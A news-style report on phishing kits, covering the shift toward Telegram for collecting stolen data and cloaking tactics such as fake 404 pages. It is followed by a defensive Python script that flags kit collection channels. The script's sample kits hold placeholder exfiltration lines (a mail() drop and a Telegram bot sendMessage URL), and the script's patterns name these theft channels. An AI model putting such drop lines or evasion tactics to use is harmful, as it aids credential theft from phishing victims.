Criminals now prefer Telegram for managing stolen information.
The majority of stolen data is handled by phishers via email, with Gmail being their email service of preference. But because Telegram gives users a great level of anonymity, criminals are also depending on it more and more.
The cybersecurity firm Group-IB identified approximately 3,700 different phishing kits in 2022, a 25% rise over 2021. A phishing kit is a collection of tools used to execute extensive phishing campaigns.
Threat actors frequently use email to handle stolen material. With 45% of phishers preferring Google’s tool to process the stolen data, Gmail continued to be the most widely used service.
However, Group-IB’s Computer Emergency Response Team (CERT-GIB) observed that there are now almost twice as many phishing kits using Telegram to gather stolen data. 9.4% of phishers handled information on Telegram in 2022.
The messenger’s flexibility and convenience allow cybercriminals to process and manage compromised information almost in real-time, the company said.
The usage of Telegram by criminals is neither shocking nor new. In fact, many encrypted communication platforms, such as Signal and WhatsApp, are abused by thieves because they provide a great level of privacy to individuals in need: demonstrators, whistleblowers, or dissidents, for instance.
Automated processes enable thieves to create and update hundreds of websites every day. Criminals concentrate on improving evasion skills in an effort to prolong the lifespan of those websites.
The most common basic access control methods are hypertext access (.htaccess) and robots.txt.
These are essentially configuration files that block access to the website for bots and search engine crawlers.
Cybercriminals also use a variety of more sophisticated evasion methods. Dynamic directories are one popular method of avoiding detection, for instance. This means that a malicious link is personal and only the recipient can access it.
Criminals also use bogus 404 pages. If a user’s device parameters, geolocation, or referer do not match the victim’s profile, all they see is an error notice rather than a malicious website.
There are numerous off-the-shelf phishing kit solutions loaded with sophisticated detection evasion tactics, which makes a defender’s task even more difficult. It means that phishing campaigns can be started by even inexperienced cybercriminals with limited technological skills.
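For defenders who recover kit archives, the collection channels (Gmail, Telegram) and the basic access-control files (.htaccess, robots.txt) described above can be tallied automatically. The following triage sketch is an added example, not code from Group-IB or from any kit; the heuristics, file names, address and token placeholder are all assumptions constructed for illustration.

```python
import re
from collections import Counter

# Heuristics (assumptions of this example, not taken from the article):
# a Telegram Bot API URL marks a Telegram drop; an address in a file that
# calls PHP mail() marks an e-mail drop.
TELEGRAM_RE = re.compile(r"api\.telegram\.org/bot", re.I)
MAIL_CALL_RE = re.compile(r"\bmail\s*\(", re.I)
EMAIL_RE = re.compile(r"[\w.+-]+@([\w-]+(?:\.[\w-]+)+)")
EVASION_FILES = {".htaccess", "robots.txt"}

def triage_kit(files):
    """files maps relative path -> text content of one unpacked kit."""
    channels, evasion = set(), set()
    for path, text in files.items():
        name = path.rsplit("/", 1)[-1].lower()
        if name in EVASION_FILES:
            evasion.add(name)  # presence alone is worth recording
            continue
        if TELEGRAM_RE.search(text):
            channels.add("telegram")
        if MAIL_CALL_RE.search(text):
            for m in EMAIL_RE.finditer(text):
                domain = m.group(1).lower()
                channels.add("gmail" if domain == "gmail.com" else "other-email")
    return {"channels": sorted(channels), "evasion": sorted(evasion)}

def channel_share(kits):
    """Count how many kits in a collection use each channel."""
    counts = Counter()
    for files in kits.values():
        counts.update(triage_kit(files)["channels"])
    return counts

# Constructed sample kits; the address and token are placeholders.
KITS = {
    "kit-a": {
        "post.php": '<?php $to = "drop.example@gmail.com"; mail($to, "s", $body);',
        ".htaccess": "# constructed placeholder",
    },
    "kit-b": {
        "send.php": '<?php $u = "https://api.telegram.org/bot<TOKEN>/sendMessage";',
        "robots.txt": "User-agent: *\nDisallow: /",
    },
}

if __name__ == "__main__":
    for name, files in KITS.items():
        print(name, triage_kit(files))
    print(dict(channel_share(KITS)))
```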